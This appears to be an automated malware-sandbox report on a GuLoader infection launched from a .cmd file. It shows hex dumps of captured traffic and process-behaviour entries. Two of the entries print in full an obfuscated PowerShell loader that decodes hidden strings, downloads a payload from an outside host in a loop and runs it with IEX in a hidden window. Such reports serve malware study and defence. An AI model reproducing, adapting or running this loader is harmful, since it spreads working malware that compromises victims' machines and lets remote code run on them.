                                                                                                                                              Data Ascii: *:4n<>$w1'U&Sb!TuiC5f>2vx*d4XU)<8#6\j(#9Mb'6[TKCz[zkFE,5KoX]c8i8o};:VI6)ASHnv4y^M3)=kkZ[f8wN<{]'ih>!Ndak^iRIt,
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: fc 55 73 07 62 53 a5 b9 fa 93 f3 e4 a1 c1 a4 d5 e6 55 57 b3 99 f9 5d 81 3a b1 d3 25 6a 29 fc e1 46 88 0b 3c 17 4d b1 16 86 e7 ca 30 d0 52 c3 22 f4 53 70 af 06 3a db e0 ad 57 d1 f6 42 16 3c 7d f0 f1 a8 b2 ee 98 fd 5d c6 4a d7 ba bf a6 53 b1 2c de 41 c6 cc ff 58 a6 e4 5c cf f3 b1 9c c8 ee e7 a9 ce ce b8 5d 46 87 9a 66 06 18 ea 2c 7c 40 d2 cb 46 66 53 7b eb d0 51 83 da 14 9d 16 03 5c 6d 69 31 37 45 00 0c 37 f7 1e 4a 87 f4 18 2b 79 f1 54 4a f5 1a 0b da c8 6c 8e e5 18 ab 3d e0 de 49 ec d9 ee a5 c8 4d fc 33 5d 93 ff b5 04 19 71 da e9 04 81 74 d4 4b 85 92 08 ec d4 6f a9 51 13 2d 43 6b 88 61 00 c9 76 33 10 d4 39 94 24 ee 71 13 67 7f 9a ae b8 f6 75 fd b0 f0 f2 32 63 52 65 6f 8f 68 8e 78 d9 02 d1 79 66 7e 98 5e a3 66 f3 47 00 95 15 b2 f7 84 ec 57 e9 4c 91 ed 97 f2
                                                                                                                                              Data Ascii: UsbSUW]:%j)F<M0R"Sp:WB<}]JS,AX\]Ff,|@FfS{Q\mi17E7J+yTJl=IM3]qtKoQ-Ckav39$qgu2cReohxyf~^fGWL
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 5c cc a1 37 d5 cf 79 90 99 75 62 cd bf 7a f8 78 26 3e b4 79 cd 39 aa fb c5 a6 9c 35 0f 4c a9 c7 a4 a6 65 e4 d9 85 fa ca 6a 17 a3 4a e6 a8 5e 85 23 f4 47 6b ae 41 1d cc 92 52 66 d5 ca 28 08 58 d5 ea e0 a5 a7 41 12 f3 29 8f f8 5f 42 2f bb f3 ae b1 eb cc 5d 4d 7e 9f 45 f8 63 56 c3 d9 8c 3a bf 66 f4 b4 59 a6 04 6c cf 9a 95 12 e8 21 07 ad 5c c1 e5 bc c2 ba 8d c8 8b ab 24 3e cb 08 02 b0 44 a2 83 3d b7 41 b8 7e c4 c3 4b 58 41 8f 38 bf 1f 31 12 0a 99 7a 62 92 0b c3 f8 f4 68 8c 53 8c e7 35 41 d6 77 e5 a4 57 74 e7 f8 b0 ff 32 b1 3a bf a5 e8 b5 7d 52 0d fc d6 c9 a1 ff 31 93 b9 5e 78 19 50 68 6f d6 b5 d3 4a 59 3a 2f a0 59 4c 6e e4 a0 6a 17 cc dd 10 d5 5a 3c a3 b7 2b 09 6b 9e f8 db c0 f4 3a 97 bc 79 07 8a e7 ae 65 da 26 d9 19 93 80 c3 af 7b 00 cc fd 55 dc e4 ba e5 8c
                                                                                                                                              Data Ascii: \7yubzx&>y95LejJ^#GkARf(XA)_B/]M~EcV:fYl!\$>D=A~KXA81zbhS5AwWt2:}R1^xPhoJY:/YLnjZ<+k:ye&{U
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: ec 4a b0 13 1b 71 54 52 35 3a 1a dc 46 da ab 08 42 da 7d 64 27 1a bb c5 dc d6 20 4d cb 07 f0 69 79 ff 39 d0 8f 52 4c 0c 71 31 68 ce 30 0c d6 e0 91 03 41 4f b1 0b 0d bb 32 ad 64 f1 49 02 cf ca a7 99 57 a0 01 b1 bf 59 e2 69 56 49 fb a9 d5 4e e2 71 02 7d 88 2e 9c 32 f4 6e 55 6f 23 50 6e d7 60 b9 45 d8 5e 2a c4 1e 48 de 92 09 26 c5 0b a1 c8 22 09 93 93 df a2 fc d1 45 9d 5e 20 11 39 ea 48 ed 28 41 1b 9b 78 4f 0b 09 81 ad 44 82 d3 9b 83 9f 43 39 bd 06 a9 e5 3e 04 28 aa 77 f0 58 59 ba 67 31 3b 1b a5 b9 03 72 f6 32 34 04 e2 bf 27 fa 74 36 bd 21 ad 1f f2 3f 3d 57 f1 71 d2 78 56 23 df 06 ed 1d bb 51 cb c2 b0 64 b5 02 58 ad 8e 4f 1e e0 c0 04 44 20 ab d3 af 04 ca ae 3a 2e c1 de 4e 9e 63 7a 52 b7 67 a6 1e 0a f2 3b df 73 f1 01 08 0a 57 a1 0f ac a8 09 10 e4 8e 6d cc 09
                                                                                                                                              Data Ascii: JqTR5:FB}d' Miy9RLq1h0AO2dIWYiVINq}.2nUo#Pn`E^*H&"E^ 9H(AxODC9>(wXYg1;r24't6!?=WqxV#QdXOD :.NczRg;sWm
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: cb 99 64 45 70 6d 94 f1 04 ca 5b a4 1a 54 d4 34 dc 86 aa 23 e0 91 37 a9 31 3f a2 ae 8a f3 ee c6 a1 e0 e5 6a b0 f8 e9 83 76 b8 3c 04 2e a1 91 f7 be b3 bc bb fc fd 01 45 6c 71 64 99 4b e4 70 30 ab 66 3b d5 bf 2a 33 6e e4 0f da f5 26 63 51 2f a1 74 f6 14 7b bc c0 13 66 7c 56 63 7a 6e 2f 1e 63 3c 08 29 03 09 a3 c8 51 11 85 6f 33 99 5a 6d 1b d5 15 4d 31 4d b2 1d 4e 08 f0 2f af 93 2c 89 0c 5b 74 47 48 30 fb 06 66 73 28 6f a8 8a 18 90 af 35 8c 39 43 65 47 72 ad 91 dd 92 b4 f9 8f 4d 8e d0 f3 e6 a5 97 d5 a4 11 c7 c7 2b 27 9c 33 74 bb 4f 6f 09 c8 92 65 ba f3 1a 16 ea 57 02 ee 5b 84 3d 0d ac aa 98 9c 2f 81 68 8a 25 2f 11 c4 10 bb 47 8a 4f aa e7 47 bb 95 31 7d 5e dc 02 62 2a fd fa 36 88 ef 89 4f aa 90 1f 43 40 24 df 16 e9 c1 48 5d 60 c2 32 d3 e0 c1 ac b8 98 3d 6d 92
                                                                                                                                              Data Ascii: dEpm[T4#71?jv<.ElqdKp0f;*3n&cQ/t{f|Vczn/c<)Qo3ZmM1MN/,[tGH0fs(o59CeGrM+'3tOoeW[=/h%/GOG1}^b*6OC@$H]`2=m
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 83 9d e4 91 40 e3 4f c2 e3 a7 67 b6 c9 c9 84 f2 e0 89 33 4f 5c fc 38 c3 6d 27 5f 97 f9 0a 46 b8 77 ae e9 da ed c1 03 69 01 de c7 81 d2 0b de 69 da 10 d5 9a bf 09 8a b0 33 b5 da c9 a1 5b d7 4f a1 f0 c5 5d 3b 73 69 49 87 cb 1b 93 62 19 94 cd 1d 2f bb 90 c2 3c c8 9d 73 a8 eb ce ee 6b 5e 1c 3f a5 bf 46 c5 ad c8 e2 89 9d b6 eb 76 33 46 d4 3d 64 f2 23 31 25 6b 70 76 be e5 d4 9b a9 b6 22 92 1d 8c 0a 27 2b 0d fd 23 c8 d7 76 77 85 28 b2 66 17 76 0b c5 22 af d6 73 ae 2f 6b 7e f4 76 ea 28 38 71 8a dc 3c c5 c1 34 13 46 8d 25 a7 c9 9a 31 20 ec 1d 84 50 75 94 2f e5 a7 30 5f 38 61 73 91 81 b7 eb e3 43 a6 d3 fb fc 5b 79 8b 6d 5b 7d aa fb cb 53 95 78 2f 1f 33 c6 3f 74 d2 6a ac 79 fe 6e 82 e7 fd 27 ff 82 dc fb 03 0f 24 da 90 e8 50 0d d1 e7 cb 8c 46 42 34 70 6b 05 9c aa 5a
                                                                                                                                              Data Ascii: @Og3O\8m'_Fwii3[O];siIb/<sk^?Fv3F=d#1%kpv"'+#vw(fv"s/k~v(8q<4F%1 Pu/0_8asC[ym[}Sx/3?tjyn'$PFB4pkZ
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 5a d6 26 32 76 60 f3 ae 74 ef d7 00 a3 ba 6b 26 ac 3c 82 a9 d4 52 e6 ef a0 1e 99 44 00 5a 9f 1d 71 12 f2 50 dc 5d ba db ea bc 34 28 93 0f 8e 3b 4a 02 df a1 77 e0 96 49 00 6c 74 18 66 5e cc 3e e5 c3 e1 f6 8b 5a c6 3f 1a dd d5 13 33 5d 78 95 22 f5 a8 6f 81 47 33 7a df c8 7d 67 54 fa 5a da 71 f3 af 08 dd 8c 6d 1b 49 fc 72 ee 97 9e 15 9b 23 86 43 01 d5 05 c9 62 e6 0d 70 fd e0 a7 fc 35 e1 ef 2f 88 63 ea 4c 98 86 48 a0 f0 dc 98 f0 10 b9 51 41 2b c0 d5 ee cd a5 72 09 ca 09 6d 05 66 12 9b a0 aa 4c 4f d0 fb 09 98 64 fc 45 54 cb 29 d4 b6 af d3 17 24 0d 48 f6 c2 5a 40 6f 4d 47 7a 7f a3 1f 7d 4b 0e 41 b6 cd af 0e c9 42 79 5b a8 8e b7 f2 4c 92 bd 12 d5 5b 25 1e f2 fc 29 0f 7e 81 07 11 46 23 cd e2 a6 a7 d2 9a 8a e6 00 34 97 30 95 2a c8 1c 2c f4 33 f0 0a fd 35 3a f3 4f
                                                                                                                                              Data Ascii: Z&2v`tk&<RDZqP]4(;JwIltf^>Z?3]x"oG3z}gTZqmIr#Cbp5/cLHQA+rmfLOdET)$HZ@oMGz}KABy[L[%)~F#40*,35:O


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:02:33:57
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" "
                                                                                                                                              Imagebase:0x7ff77adc0000
                                                                                                                                              File size:289'792 bytes
                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:1
                                                                                                                                              Start time:02:33:57
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:02:33:57
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                              File size:452'608 bytes
                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:02:33:57
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:02:34:08
                                                                                                                                              Start date:21/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
